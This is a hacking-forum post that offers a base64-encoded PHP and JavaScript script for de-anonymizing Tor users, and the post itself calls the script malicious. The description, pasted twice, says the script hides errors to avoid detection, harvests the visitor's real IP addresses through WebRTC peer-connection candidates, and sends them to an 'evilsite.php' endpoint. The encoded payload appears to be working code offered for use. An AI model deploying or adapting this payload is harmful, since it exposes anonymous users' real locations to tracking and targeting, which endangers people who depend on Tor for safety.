Obtain Tor User's Ip By Bypassing Exit Node 02-03-2023, 11:34 AM
#1
Warning This Code Contains Malicious Scripting Use With Caution
This malicious script is designed to obtain a user's home IP address by bypassing the exit node of a TOR network. It begins by setting various PHP parameters such as error reporting, max execution time, and display errors to 0 in order to prevent detection. It then creates a JavaScript function that uses the RTPDataChannels feature to obtain the user's IP address. The code also contains a 'httpGet' function which sends an HTTP request and returns the response. Finally, the code echoes the malicious script, which attempts to obtain the IP address and send it to a server at 'localhost/evilsite.php?IP='. This malicious script can be used to gather information about a user's online activity, which can be used to track them or gain unauthorized access to their system.
The code is in base64 decode it
This malicious script is designed to obtain a user's home IP address by bypassing the exit node of a TOR network. It begins by setting various PHP parameters such as error reporting, max execution time, and display errors to 0 in order to prevent detection. It then creates a JavaScript function that uses the RTPDataChannels feature to obtain the user's IP address. The code also contains a 'httpGet' function which sends an HTTP request and returns the response. Finally, the code echoes the malicious script, which attempts to obtain the IP address and send it to a server at 'localhost/evilsite.php?IP='. This malicious script can be used to gather information about a user's online activity, which can be used to track them or gain unauthorized access to their system.
Code:
PD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCnNldF90aW1lX2xpbWl0KDApOw0KaW5pX3NldCjigJhkaXNwbGF5X2Vycm9yc-KAmSwgMCk7DQppbmlfc2V0KOKAmG1heF9leGVjdXRpb25fdGltZeKAmSwgMCk7DQoqLw0KJGV4cGxvaXQgPSDigJwNCjxzY3JpcHQgdHlwZT3igJl0ZXh0L2phdmFzY3JpcHTigJk-DQpodHRwR2V0KOKAmGh0dHA6Ly9sb2NhbGhvc3QvZXZpbHNpdGUucGhwP0lQPVsgSVAgU1RBUlQgXeKAmSkgLy8gT2J0YWluaW5nIHRvciB1c2VycyBob21lIGlwIGJ5cGFzc2luZyBleGl0IG5vZGUNCnZhciBpcDIgPSDigJjigJk7DQpmdW5jdGlvbiBnZXRJUHMoY2FsbGJhY2spIHsNCnZhciBpcF9kdXBzID0ge307DQp2YXIgUlRDUGVlckNvbm5lY3Rpb24gPSB3aW5kb3cuUlRDUGVlckNvbm5lY3Rpb24NCnx8IHdpbmRvdy5tb3pSVENQZWVyQ29ubmVjdGlvbg0KfHwgd2luZG93LndlYmtpdFJUQ1BlZXJDb25uZWN0aW9uOw0KdmFyIG1lZGlhQ29uc3RyYWludHMgPSB7DQpvcHRpb25hbDogW3tSdHBEYXRhQ2hhbm5lbHM6IHRydWV9XQ0KfTsNCi8vIG1lZGlhLnBlZXJjb25uZWN0aW9uLmRlZmF1bHRfaWNlc2VydmVycyA9DQovLyBbe-KAmHVybOKAmTog4oCYc3R1bjpzdHVuLnNlcnZpY2VzLm1vemlsbGEuY29t4oCZfV0NCnZhciBzZXJ2ZXJzID0gdW5kZWZpbmVkOw0KaWYgKHdpbmRvdy53ZWJraXRSVENQZWVyQ29ubmVjdGlvbikNCnNlcnZlcnMgPSB7aWNlU2VydmVyczogW3t1cmxzOiDigJhzdHVuOnN0dW4uc2VydmljZXMubW96aWxsYS5jb23igJl9XX07DQovY29uc3RydWN0IGEgbmV3IFJUQ1BlZXJDb25uZWN0aW9uDQp2YXIgcGMgPSBuZXcgUlRDUGVlckNvbm5lY3Rpb24oc2VydmVycywgbWVkaWFDb25zdHJhaW50cyk7DQpwYy5vbmljZWNhbmRpZGF0ZSA9IGZ1bmN0aW9uKGljZSkgew0KaWYgKGljZS5jYW5kaWRhdGUpIHsNCnZhciBpcF9yZWdleCA9IC8oWzDigJM5XXsxLDN9KFwuWzDigJM5XXsxLDN9KXszfSkvOw0KdmFyIGlwX2FkZHIgPSBpcF9yZWdleC5leGVjKGljZS5jYW5kaWRhdGUuY2FuZGlkYXRlKVsxXTsNCmlmIChpcF9kdXBzW2lwX2FkZHJdID09PSB1bmRlZmluZWQpDQpjYWxsYmFjayhpcF9hZGRyKTsNCmlwX2R1cHNbaXBfYWRkcl0gPSB0cnVlOw0KfQ0KfTsNCnBjLmNyZWF0ZURhdGFDaGFubmVsKOKAmOKAmSk7DQpwYy5jcmVhdGVPZmZlcihmdW5jdGlvbihyZXN1bHQpIHsNCnBjLnNldExvY2FsRGVzY3JpcHRpb24ocmVzdWx0LCBmdW5jdGlvbigpIHsNCn0sIGZ1bmN0aW9uKCkgew0KfSk7DQp9LCBmdW5jdGlvbigpIHsNCn0pOw0KfQ0KZ2V0SVBzKGZ1bmN0aW9uKGlwKSB7DQplbnZpb3IoaXApOyAvL1NVQiBQUk9DRVNTTw0KfQ0KKTsNCmZ1bmN0aW9uIGh0dHBHZXQodXJsKQ0Kew0KdmFyIHhtbEh0dHAgPSBudWxsOw0KeG1sSHR0cCA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOw0KeG1sSHR0cC5vcGVuKOKAmEdFVOKAmSwgdXJsLCBmYWxzZSk7DQp4bWxIdHRwLnNlbmQobnVsbCk7DQpyZXR1cm4geG1sSHR0cC5yZXNwb25zZVRleHQ7DQp9DQpmdW5jdGlvbiBlbnZpb3IodmFsb3IpIHsNCmlwMiA9IOKAmCDigJQg4oCYICsgdmFsb3IudG9TdHJpbmcoKTsNCmRvY3VtZW50LndyaXRlKGh0dHBHZXQo4oCYaHR0cDovL2xvY2FsaG9zdC9ldmlsc2l0ZS5waHA_SVA94oCZICsgaXAyKSk7DQp9DQo8L3NjcmlwdD7igJ07DQplY2hvICRleHBsb2l0OwThe code is in base64 decode it
(This post was last modified: 02-03-2023, 11:35 AM by DoXeD.)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
